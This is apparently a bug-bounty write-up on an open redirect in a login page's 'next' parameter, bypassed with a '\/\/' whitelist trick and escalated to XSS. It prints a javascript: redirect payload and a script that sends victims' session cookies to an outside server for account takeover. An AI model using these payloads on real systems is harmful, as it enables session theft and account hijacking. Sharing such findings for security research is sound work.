Open Redirect >> XSS

How I found Open Redirect which could be escalated to XSS and potential Account takeover

I was hunting for IDORs for a really long time on this particular target but it was quite secure against IDOR. I was trying to make an unauthenticated action on an account with another account to get horizontal privelege escalation thorough IDOR. But it redirected to the login page for confirming authentication.😐

However I noticed that the login URL was something like : https://target.com/login?next=/endpoint

So now I have a new parameter to test 💯 I started the XSS automation in the background on this endpoint Then I started testing for Open Redirect.

On Logging in through https://target.com/login?next=https://google.com It was not redirecting but on login using : https://target.com/login?next=/profile , it was redirecting to user profile

This means that whitelisting is being used. i.e. redirection is only allowed on *.target.com. I did some research on how to bypass such restrictions. Then I came to my all time favorite repository for payloads: github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect#filter-bypass

I tried these whitelisting filter bypassing techniques one by one and after many tries I logged in using: https://target.com/login?next=\/\/google.com/ And as soon as I logged in, it redirected me to google.com 🔥

The significance of "\/\/" is that the browser considers "\/" as "//"

This can be further escalated to XSS. Host a script on your server that extracts user cookies. ?next=\/\/javascript%3A%2F%2F%250Aalert(document.domain);

<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>

When a user logs in using this link, you will get their session cookies on your server. To learn more about this, refer: https://github.com/s0wr0b1ndef/xss-reflected-steal-cookie.md You can then use these cookies to imitate the user. Full Account takeover 🥳

Hope you liked it :) . Feedbacks are always welcomed.